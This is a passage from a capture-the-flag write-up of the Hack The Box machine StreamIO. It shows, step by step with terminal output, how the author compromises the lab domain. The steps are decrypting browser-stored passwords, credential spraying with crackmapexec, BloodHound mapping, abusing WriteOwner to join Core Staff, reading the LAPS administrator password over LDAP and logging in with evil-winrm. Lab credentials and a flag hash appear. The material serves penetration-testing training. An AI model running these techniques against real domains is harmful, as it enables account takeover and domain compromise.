OCTETSTRING b'51ba44cdd139e4d2b25f8d94075ce3aa4a3d516c2e37be634d5e50f6d2f47266'
}
clearText b'b3610ee6e057c4341fc76bc84cc8f7cd51abfe641a3eec9d0808080808080808'
decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'
Crackmapexec and WinRM¶
We add a new login and password to list: users and password
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ crackmapexec smb 10.10.11.158 -u users -p password --continue-on-success | grep "+"
SMB 10.10.11.158 445 DC [+] streamIO.htb\nikk37:[email protected]
SMB 10.10.11.158 445 DC [+] streamIO.htb\nikk37:[email protected]
SMB 10.10.11.158 445 DC [+] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r
---
JDgodd doesn’t have permissions to WinRM
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ crackmapexec winrm 10.10.11.158 -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r'
SMB 10.10.11.158 5985 DC [*] Windows 10.0 Build 17763 (name:DC) (domain:streamIO.htb)
HTTP 10.10.11.158 5985 DC [*] http://10.10.11.158:5985/wsman
WINRM 10.10.11.158 5985 DC [-] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r
BloodHound¶
Collect info¶
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_StreamIO/BloodHound]
└─$ bloodhound-python -c All -u jdgodd -p 'JDg0dd1s@d0p3cr3@t0r' -ns 10.10.11.158 -d streamio.htb -dc streamio.htb
INFO: Found AD domain: streamio.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: streamio.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: streamio.htb
INFO: Found 8 users
INFO: Found 54 groups
INFO: Found 4 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.streamIO.htb
INFO: Done in 00M 09S
Import data¶
Run commands:
sudo neo4j console
bloodhound
___
└─$ sudo neo4j console
[sudo] password for kali:
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
2024-04-08 12:51:20.115+0000 INFO Starting...
2024-04-08 12:51:20.966+0000 INFO This instance is ServerId{0f09f652} (0f09f652-c95a-49aa-9cdb-212f6e771b11)
2024-04-08 12:51:24.177+0000 INFO ======== Neo4j 4.4.26 ========
2024-04-08 12:51:27.005+0000 INFO Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2024-04-08 12:51:27.006+0000 INFO Updating the initial password in component 'security-users'
2024-04-08 12:51:29.373+0000 INFO Bolt enabled on localhost:7687.
2024-04-08 12:51:31.639+0000 INFO Remote interface available at http://localhost:7474/
2024-04-08 12:51:31.650+0000 INFO id: AF96C6329EC87C67BF9C98E343F792FFF2E03F35810146E66703FD2132CD5256
2024-04-08 12:51:31.651+0000 INFO name: system
2024-04-08 12:51:31.651+0000 INFO creationDate: 2023-04-06T13:10:25.992Z
2024-04-08 12:51:31.652+0000 INFO Started.
___
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_StreamIO/BloodHound]
└─$ bloodhound
(node:447917) electron: The default of contextIsolation is deprecated and will be changing from false to true in a future release of Electron. See https://github.com/electron/electron/issues/23506 for more information
(node:447959) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.
(BloodHound:447917): GVFS-RemoteVolumeMonitor-WARNING **: 14:52:18.944: remote volume monitor with dbus name org.gtk.vfs.UDisks2VolumeMonitor is not supported
Analysis¶
JDgodd has ownership and WriteOwner on the Core Staff group:
Get LAPS Password¶
Download PowerView.ps1¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 ; file PowerView.ps1
--2024-04-08 15:03:06-- https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 770279 (752K) [text/plain]
Saving to: ‘PowerView.ps1’
PowerView.ps1 100%[==============================================>] 752.23K --.-KB/s in 0.1s
2024-04-08 15:03:06 (6.61 MB/s) - ‘PowerView.ps1’ saved [770279/770279]
PowerView.ps1: ASCII text
Upload PowerView.ps1¶
*Evil-WinRM* PS C:\Users\nikk37\Desktop> upload /mnt/oscp/writeups/HTB/HTB_StreamIO/PowerView.ps1
Info: Uploading /mnt/oscp/writeups/HTB/HTB_StreamIO/PowerView.ps1 to C:\Users\nikk37\Desktop\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\nikk37\Desktop> . .\PowerView.ps1
*Evil-WinRM* PS C:\Users\nikk37\Desktop>
Create a variable with credentials¶
*Evil-WinRM* PS C:\Users\nikk37\Desktop> $pass = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\nikk37\Desktop> $cred = New-Object System.Management.Automation.PSCredential('streamio.htb\JDgodd', $pass)
Add JDgood to the group: Core Staff¶
*Evil-WinRM* PS C:\Users\nikk37\Desktop> Add-DomainObjectAcl -Credential $cred -TargetIdentity "Core Staff" -PrincipalIdentity "streamio\JDgodd"
*Evil-WinRM* PS C:\Users\nikk37\Desktop> Add-DomainGroupMember -Credential $cred -Identity "Core Staff" -Members "StreamIO\JDgodd"
*Evil-WinRM* PS C:\Users\nikk37\Desktop> net user jdgodd
User name JDgodd
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/22/2022 2:56:42 AM
Password expires Never
Password changeable 2/23/2022 2:56:42 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/8/2024 1:08:14 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *CORE STAFF
The command completed successfully.
```
### Get LAPS Password
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO] └─$ ldapsearch -x -H ldap://10.10.11.158 -b 'DC=streamIO,DC=htb' -x -D "[email protected]" -w 'JDg0dd1s@d0p3cr3@t0r' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
extended LDIF¶
¶
LDAPv3¶
base with scope subtree¶
filter: (ms-MCS-AdmPwd=*)¶
requesting: ms-MCS-AdmPwd¶
¶
DC, Domain Controllers, streamIO.htb¶
dn: CN=DC,OU=Domain Controllers,DC=streamIO,DC=htb ms-Mcs-AdmPwd: 077StPm(a%rF/1
search reference¶
ref: ldap://ForestDnsZones.streamIO.htb/DC=ForestDnsZones,DC=streamIO,DC=htb
search reference¶
ref: ldap://DomainDnsZones.streamIO.htb/DC=DomainDnsZones,DC=streamIO,DC=htb
search reference¶
ref: ldap://streamIO.htb/CN=Configuration,DC=streamIO,DC=htb
search result¶
search: 2 result: 0 Success
numResponses: 5¶
numEntries: 1¶
numReferences: 3¶
# Login as administrator
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO] └─$ evil-winrm -u administrator -p '077StPm(a%rF/1' -i 10.10.11.158
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
# Read flag: root.txt
Evil-WinRM PS C:\Users\Administrator\Documents> dir ../Desktop Evil-WinRM PS C:\Users\Administrator\Documents> cd .. Evil-WinRM PS C:\Users\Administrator> cd .. Evil-WinRM PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 2/22/2022 2:48 AM .NET v4.5 d----- 2/22/2022 2:48 AM .NET v4.5 Classic d----- 2/26/2022 10:20 AM Administrator d----- 5/9/2022 5:38 PM Martin d----- 2/26/2022 9:48 AM nikk37 d-r--- 2/22/2022 1:33 AM Public
Evil-WinRM PS C:\Users> cd Martin\Desktop Evil-WinRM PS C:\Users\Martin\Desktop> dir
Directory: C:\Users\Martin\Desktop
Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 4/8/2024 8:56 AM 34 root.txt
Evil-WinRM PS C:\Users\Martin\Desktop> type root.txt 538ef1a8218fb291d8f019f4fb7d14b3 Evil-WinRM PS C:\Users\Martin\Desktop>
# References
Firepwd.py, an open source tool to decrypt Mozilla protected passwords
# Lessons Learned
# Tags
```